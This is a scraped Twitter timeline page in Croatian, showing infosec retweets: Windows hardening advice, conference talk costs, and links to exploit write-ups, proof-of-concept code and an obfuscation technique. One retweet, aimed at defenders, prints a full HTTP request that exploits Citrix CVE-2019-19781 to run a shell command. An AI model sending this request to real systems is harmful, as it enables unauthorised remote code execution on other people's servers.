Tweetovi
- Tweetovi, trenutna stranica.
- Tweetovi i odgovori
Blokirali ste korisnika/cu @pwn_the_world
Jeste li sigurni da želite vidjeti te tweetove? Time nećete deblokirati korisnika/cu @pwn_the_world
-
pwn proslijedio/la je Tweet
At least the recovered number is trending better, https://gisanddata.maps.arcgis.com/apps/opsdashboard/index.html#/bda7594740fd40299423467b48e9ecf6 …
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
pwn proslijedio/la je Tweet
Hardening Windows isn't conceptually difficult: 1. Patch. 2. Harden Office. 3. Change handlers for risky file types 4. CLM. 5. Use some form of app control/AWL. 6. Block/detect LoLbins. 7. Standard User accounts. 8. Deny inbound traffic not fr. PAWs. 9. Manage admin passwords.
Prikaži ovu nitHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
pwn proslijedio/la je Tweet
This is what I've been working on recently. Together with the hardlink mitigation, they will mitigate >100 vulnerabilities we've received in the past year. Stay tuned. https://twitter.com/dwizzzleMSFT/status/1225048404298027008 …pic.twitter.com/kmPqfhJvhb
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
pwn proslijedio/la je Tweet
For transparency, here's what my 2019/2020 speaking engagements have offered to cover: Kaspersky SAS: nothing REcon: hotel+flights Blackhat: h+f+honorarium Jailbreak Security: h+f BSides: nothing Bluehat IL: h+f OffensiveCon: h+f+honorarium THOTCON (keynote): h+f+Lyft+honorariumhttps://twitter.com/IanColdwater/status/1224747793627144192 …
Prikaži ovu nitHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
pwn proslijedio/la je Tweet
How to make friends at a Hacker Con when you don’t know anyone? Nerd stickers.pic.twitter.com/7ShxNOPR9e
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
pwn proslijedio/la je Tweet
Some
#bugbounty hunters made over €50.000 in bug bounties with this simple trick.
Thanks for the #BugBountyTip,@rez0__!pic.twitter.com/z9sPFJTNqV
Prikaži ovu nitHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
pwn proslijedio/la je Tweet
For team blue: Turns out CVE-2019-19781 doesn't need a traversal, beware. POST /vpns/portal/scripts/newbm.pl HTTP/1.1 Host: <target> NSC_USER: ../../../netscaler/portal/templates/si NSC_NONCE: 5 Content-Length: 53 url=a&title=[%+http://template.new ({'BLOCK'='print+`id`'})%]
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
pwn proslijedio/la je Tweet
Give a man an 0day and he'll have access for a day, teach a man to phish and he'll have access for life.
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
pwn proslijedio/la je Tweet
[Educational] One of the best blog posts that I ever read about going from 0 to unauth RCE in f**king Mikrotik OS step by step:https://medium.com/@maxi./finding-and-exploiting-cve-2018-7445-f3103f163cc1 …
Prikaži ovu nitHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
pwn proslijedio/la je Tweet
Memhunter - Live Hunting Of Code Injection Techniqueshttp://www.kitploit.com/2020/01/memhunter-live-hunting-of-code.html …
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
pwn proslijedio/la je TweetHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi
-
pwn proslijedio/la je Tweet
If you're not retaining things like DHCP logs, DNS logs, RDP logs, some kind of internal network monitoring/visibility, you should do that. Trying to hunt through 2 month old traffic is hard when you can't correlate IP to Endpoint because DHCP.
#infosecHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
pwn proslijedio/la je Tweet
New article! Anti-virus Exploitation: Malwarebytes 4.0.4 - Protection Not Found - Hijacking Malwarebytes via COM IPChttps://0x00sec.org/t/anti-virus-exploitation-malwarebytes-4-0-4-protection-not-found-hijacking-malwarebytes-via-com-ipc/18766 …
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
pwn proslijedio/la je Tweet
PoC (DoS) for CVE-2020-0609 & CVE-2020-0610 - RD Gateway RCEhttps://github.com/ollypwn/BlueGate …
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
pwn proslijedio/la je Tweet
progressing through the Hacksys Extreme Vulnerable Driver exploits here: https://h0mbre.github.io/ . huge thanks to the sourced authors, feels very silly to write my own blogs on the subject compared to their material/experience,but helps me learn. mb helpful for other noobs like me
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
pwn proslijedio/la je Tweet
Finally uploaded video of my talk "Expanding the Reach of Fuzz Testing", which I gave at UMass Amherst! Introduces PerfFuzz, FuzzFactory, FairFuzz, Zest + JQF, RLCheck and Autopandas
https://youtu.be/xfJeiteNOik Prikaži ovu nitHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
pwn proslijedio/la je Tweet
A write up of PowerShell obfuscation using SecureString: an obfuscation technique that has so far not received the attention it deserves. Your EDR might decode Base64 encoded strings, but will it automatically decode SecureString objects? Probably not.
https://www.wietzebeukema.nl/blog/powershell-obfuscation-using-securestring …pic.twitter.com/J4uzBJDyNf
Prikaži ovu nitHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
pwn proslijedio/la je Tweet
• Read everyday. • Spend time with nature. • Ask questions. • Never stop learning. • Don't pay attention to what others think of you. • Do what interests you the most. • Study hard. • Teach others what you know. • Make mistakes and learn. • It's Okay to not know things!pic.twitter.com/MmdOjZBWYd
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
pwn proslijedio/la je Tweet
"Analyzing Modern Malware Techniques - Part 1" by
@danusminimushttps://0x00sec.org/t/analyzing-modern-malware-techniques-part-1/18663 …Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
pwn proslijedio/la je Tweet
#SharedLinks - Deep Dive to Citrix ADC Remote Code Execution, CVE-2019-19781 - http://j.mp/3ajxDWX pic.twitter.com/K7IqZAQx9H
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi
Čini se da učitavanje traje već neko vrijeme.
Twitter je možda preopterećen ili ima kratkotrajnih poteškoća u radu. Pokušajte ponovno ili potražite dodatne informacije u odjeljku Status Twittera.